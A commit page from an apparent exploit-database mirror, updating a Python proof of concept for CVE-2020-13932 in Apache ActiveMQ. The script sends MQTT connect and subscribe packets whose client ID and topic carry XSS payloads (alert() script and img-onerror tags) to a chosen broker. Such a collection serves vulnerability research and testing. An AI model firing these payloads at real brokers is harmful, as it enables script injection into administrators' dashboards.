openkylin
/
openkylin-exploit-db
mirror of https://gitee.com/openkylin/openkylin-exploit-db.git
9
0
Fork 0
Code Issues Projects Releases Wiki Activity

update cve/apache-activemq/2020/CVE-2020-13932/poc.py. 

Signed-off-by: ZodiacLyu <lvyusong@buaa.edu.cn>
This commit is contained in:
ZodiacLyu 2023-03-16 08:25:03 +00:00 committed by Re3et
parent cd94b89bfd
commit af6a794492
1 changed files with 13 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
cve/apache-activemq/2020/CVE-2020-13932/poc.py
View File

@ -1,18 +1,22 @@
from scapy.contrib.mqtt import *
from scapy.compat import raw
import time
import socket
from scapy.contrib.mqtt import *
from scapy.compat import raw
brokerIP = "" # input the server IP here
brokerPort = 1883 # The default listen port of MQTT is 1883
clientid = "<script>alert(1)</script>" # malformed clientid
clientid = "<script>alert(0)</script>" #Malformed Clientid
malformedTopic = "<img src=\"1.1.1.1\" onerror=\"alert(1)\">" # Malformed Topic
if __name__ == '__main__':
connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
# craft the malformed connect message
# Malformed Connect Message
subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
# Malformed Subscribe Message
conn = socket.socket()
conn.connect((brokerIP, brokerPort))
conn.send(raw(connMessage))
# Then check the dashboard to see malformed connection
time.sleep(20)
time.sleep(1)
conn.send(raw(subMessage))
input() # Keep the MQTT Connection
conn.close()